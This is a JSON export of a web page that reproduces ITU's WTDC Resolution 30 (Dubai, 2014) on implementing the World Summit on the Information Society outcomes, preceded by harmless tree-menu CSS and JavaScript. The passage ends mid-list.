{"id":1605,"date":"2015-06-30T11:12:15","date_gmt":"2015-06-30T15:12:15","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1605"},"modified":"2015-06-30T11:29:56","modified_gmt":"2015-06-30T15:29:56","slug":"wtdc-2014_30","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2014\/wtdc-2014_30\/","title":{"rendered":"WTDC Resolution 30"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 30 (Rev. Dubai, 2014)<\/span><\/h3>\n<h4><span style=\"\">Role of the ITU Telecommunication Development Sector in implementing the outcomes of the World Summit on the Information Society<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Dubai, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) Resolution 71 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the strategic plan for the Union for 2012-2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) Resolution 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on strengthening the role of ITU in building confidence and security in the use of information and communication technologies (ICTs);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) Resolution 139 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on telecommunications\/ICTs to bridge the digital divide and build an inclusive information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) Resolution 140 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s role in implementing the outcomes of the World Summit on the Information Society (WSIS);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e) Resolution 172 (Guadalajara, 2010) of the Plenipotentiary Conference, on overall review of implementation of the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">f) the documents adopted by both phases of WSIS, namely:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 the Geneva Declaration of Principles and Geneva Plan of Action;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 the Tunis Commitment and Tunis Agenda for the Information Society;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g) the outcomes of the Ministerial Round Table held at the WSIS Forum 2013, where the ministers &#8220;encouraged the WSIS process to continue beyond 2015&#8221;;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h) the outcomes of the WSIS+10 review process,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) that WSIS stated that the core competencies of ITU are of crucial importance for building the information society, and identified ITU as a moderator\/facilitator for implementing Action Lines C2 and C5, and as a partner in Action Lines C1, C3, C4, C6, C7 and C11, as well as Action Line C8 as stated in Resolution 140 (Rev. Guadalajara, 2010);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) that it was agreed among the parties to follow up the Summit outcomes to appoint ITU as moderator\/facilitator for the implementation of Action Line C6, in which it was previously only a partner;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) that the ITU Telecommunication Development Sector (ITU\u2011D) \u2013 in view of its purposes and objectives; the nature of the existing partnership among Member States and ITU\u2011D Sector Members; its experience over many years in dealing with different development needs and implementing a range of projects, including infrastructure projects and specifically telecommunication\/ICT infrastructure projects, financed by the United Nations Development Programme (UNDP) and various funds and through possible partnerships; the nature of its five existing objectives, adopted at this conference to meet the needs of the telecommunication\/ICT infrastructure, including building confidence and security in the use of telecommunications\/ICTs and fostering an enabling environment, and to achieve the WSIS goals; and the presence of its authorized regional offices \u2013 is a key partner in the implementation of WSIS outcomes, in respect of Action Lines C2, C5 and C6, which are the cornerstone of the Sector&#8217;s work pursuant to the ITU Constitution and Convention, and also participates with other stakeholders, as appropriate, in the implementation of Action Lines C1, C3, C4, C7, C8, C9 and C11 and all other relevant action lines and other WSIS outcomes, within the financial limits set by the Plenipotentiary Conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) that the WSIS process will be reviewed in 2015, and that process will consider the post-2015 development vision,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing further<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">that the Plenipotentiary Conference, in its Resolution 140 (Rev. Guadalajara, 2010), resolved that ITU should complete the report on the implementation of WSIS outcomes concerning ITU in 2014,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">taking into account<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) Resolution 75 (Rev. Dubai, 2012) of the World Telecommunication Standardization Assembly, on the ITU Telecommunication Standardization Sector&#8217;s contribution in implementing the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) Resolution 61 (Geneva, 2012) of the Radiocommunication Assembly, on the ITU Radiocommunication Sector&#8217;s contribution in implementing the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) the programmes, activities and regional initiatives being carried out in accordance with the decisions of this conference for bridging the digital divide;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) the relevant work already accomplished and\/or to be carried out by ITU and reported to the ITU Council through the Council Working Group on WSIS (CWG\u2011WSIS),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) Council Resolution 1332, on ITU&#8217;s role in the implementation of the WSIS outcomes up to 2015 and future activities beyond WSIS+10;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">b) Council Resolution 1334 (Modified 2013), on ITU&#8217;s role in the overall review of the implementation of the WSIS outcomes, which resolved to hold the ITU-coordinated WSIS+10 high-level event at which the adoption of the following outcome documents is envisaged:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 draft WSIS+10 Statement on implementation of WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 draft WSIS+10 Vision for WSIS beyond 2015, under the mandates of the participating agencies;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) Council Resolution 1336, on the Council Working Group on international Internet-related public policy issues,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting further<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">that the ITU Secretary-General created the ITU WSIS Task Force to formulate strategies and coordinate ITU&#8217;s policies and activities in relation to WSIS, as noted by Council Resolution 1332,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves to invite the ITU Telecommunication Development Sector<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to continue working in cooperation with the other ITU Sectors and with development partners (governments, specialized agencies of the United Nations, relevant international and regional organizations, etc.), through a clear plan and appropriate mechanisms for coordination among the different partners concerned at the national, regional, interregional and global levels, having particular regard to the needs of the developing countries1, including in the field of building the telecommunication\/ICT infrastructure, building confidence and security in the use of telecommunications\/ICTs, and implementation of the other WSIS goals;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to continue to encourage the principle of non-exclusion from the information society and to devise appropriate mechanisms to this end (\u00a7\u00a7 20-25 of the Tunis Commitment);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to continue to facilitate an enabling environment encouraging ITU\u2011D Sector Members to give priority to investing in the development of the telecommunication\/ICT infrastructure, encompassing rural, isolated and remote regions, through different technologies;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4 to assist Member States in finding and\/or improving innovative financial mechanisms to develop telecommunication\/ICT infrastructure (such as the Digital Solidarity Fund and others mentioned in \u00a7 27 of the Tunis Agenda, and partnerships);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5 to continue to assist developing countries in advancing their legal and regulatory frameworks in order to further the goal of building the telecommunication\/ICT infrastructure and achieve the other WSIS goals;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6 to promote international cooperation and capacity building in issues related to cyberthreats and building confidence and security in the use of ICTs consistent with Action Line C5, in which ITU is sole facilitator;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7 to pursue its activities in the field of statistical work for telecommunication development, using the indicators required to evaluate progress in this area with a view to bridging the digital divide, inter alia, within the framework of the Partnership on Measuring ICT for Development and consistent with \u00a7\u00a7 113\u2011118 of the Tunis Agenda, acting on the content of Resolution 8 (Rev. Dubai, 2014) of this conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">8 to develop and implement the ITU\u2011D strategic plan, taking into account the need to give priority to building the telecommunication\/ICT infrastructure, including broadband access, at the national, regional, interregional and global levels, and to achieve the other WSIS goals related to the activities of ITU\u2011D;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">9 to continue to propose at the forthcoming plenipotentiary conference appropriate mechanisms for funding the activities flowing from the WSIS outcomes that are relevant to the core competencies of ITU, specifically those to be adopted in relation to:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">i) Action Lines C2, C5 and C6, in which ITU is now identified as the sole facilitator;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii) Action Lines C1, C3, C4, C6, C7, including its eight sub-action lines, and C11, in which ITU is now identified as a co-facilitator, as well as C8 and C9, in which ITU is identified as a partner,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to continue to provide CWG-WSIS with a comprehensive summary of ITU\u2011D activities on implementation of the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to ensure that concrete objectives and deadlines for WSIS activities are developed and reflected in the operational plans of ITU\u2011D, in accordance with Resolution 140 (Rev. Guadalajara, 2010) and with the objectives that will be set for ITU\u2011D by the Plenipotentiary Conference in 2014 with regard to the implementation by ITU of the WSIS+10 outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to provide the membership with information on emerging trends based on ITU\u2011D activities;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4 to take appropriate action to facilitate the activities to implement this resolution,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">further instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"col\">\n<div class=\"nodecontent\">1 to act as a catalyst in the development of partnerships among all parties, with a view to ensuring that initiatives and projects attract investment, and to continue to act as a catalyst in the following functions, among others:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 encouraging the implementation of regional telecommunication\/ICT initiatives and projects;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 participating in the organization of training seminars;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 signing agreements with national, regional and international partners involved in development, when required;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013 collaborating on initiatives and projects with other relevant international, regional and intergovernmental organizations, where appropriate;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to promote human capacity building in developing countries relating to various aspects of the telecommunication\/ICT sector, consistent with the mandate of ITU\u2011D;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to foster, particularly with the ITU regional offices, the conditions required for a successful knowledge-based enterprise incubator process and other projects for small, medium and micro enterprises (SMMEs) in and among developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4 to encourage the international financial institutions, Member States and Sector Members, in their respective roles, to address, as a priority issue, the building, reconstruction and upgrading of networks and infrastructure in developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5 to pursue coordination with international bodies, with a view to mobilizing the financial resources needed in the implementation of projects;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">6 to take the necessary initiatives to encourage partnerships which have been given high priority pursuant to:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">i) the Geneva 